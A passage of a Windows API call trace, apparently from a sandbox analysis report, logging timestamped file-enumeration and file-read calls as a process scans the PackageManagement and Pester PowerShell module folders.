nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0281.575] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0281.575] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0281.576] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0281.576] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aaa0) returned 1 [0281.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa60) returned 1 [0281.576] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0281.576] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0281.576] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0281.577] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0281.577] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0281.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8a860, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.577] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x653ef8ad90 | out: lpFileInformation=0x653ef8ad90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0281.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.577] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8a7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.577] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8aa10 | out: lpFindFileData=0x653ef8aa10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.578] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a9d0 | out: lpFindFileData=0x653ef8a9d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.578] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a9d0 | out: lpFindFileData=0x653ef8a9d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0281.578] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a9d0 | out: lpFindFileData=0x653ef8a9d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.578] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac30) returned 1 [0281.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abf0) returned 1 [0281.579] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8a8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0281.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad20) returned 1 [0281.579] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8ae00 | out: lpFileInformation=0x653ef8ae00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0281.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ace0) returned 1 [0281.579] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8a5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0281.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aac0) returned 1 [0281.579] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x7f4 [0281.579] GetFileType (hFile=0x7f4) returned 0x1 [0281.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa30) returned 1 [0281.579] GetFileType (hFile=0x7f4) returned 0x1 [0281.579] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c108df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ab98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c108df0*, lpNumberOfBytesRead=0x653ef8ab98*=0x5f8, lpOverlapped=0x0) returned 1 [0281.580] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c108328, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x653ef8ab98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c108328*, lpNumberOfBytesRead=0x653ef8ab98*=0x0, lpOverlapped=0x0) returned 1 [0281.580] ReadFile (in: hFile=0x7f4, lpBuffer=0x25b5c108df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ab98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c108df0*, lpNumberOfBytesRead=0x653ef8ab98*=0x0, lpOverlapped=0x0) returned 1 [0281.580] CloseHandle (hObject=0x7f4) returned 1 [0281.581] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0281.581] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0281.581] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0281.582] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0281.582] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0281.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.582] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8a780, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.582] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8a9b0 | out: lpFindFileData=0x653ef8a9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.582] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.582] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0281.583] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.583] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8aca0) returned 1 [0281.583] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8a780, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.583] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8a9b0 | out: lpFindFileData=0x653ef8a9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.584] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.584] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0281.584] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a970 | out: lpFindFileData=0x653ef8a970*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0281.584] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8abd0) returned 1 [0281.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ab90) returned 1 [0281.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab10) returned 1 [0281.585] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8a5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.585] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8a820 | out: lpFindFileData=0x653ef8a820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.585] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.585] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0281.585] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0281.586] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0281.586] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0281.586] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0281.586] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0281.586] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0281.587] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0281.587] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0281.587] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0281.587] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0281.588] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0281.588] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, 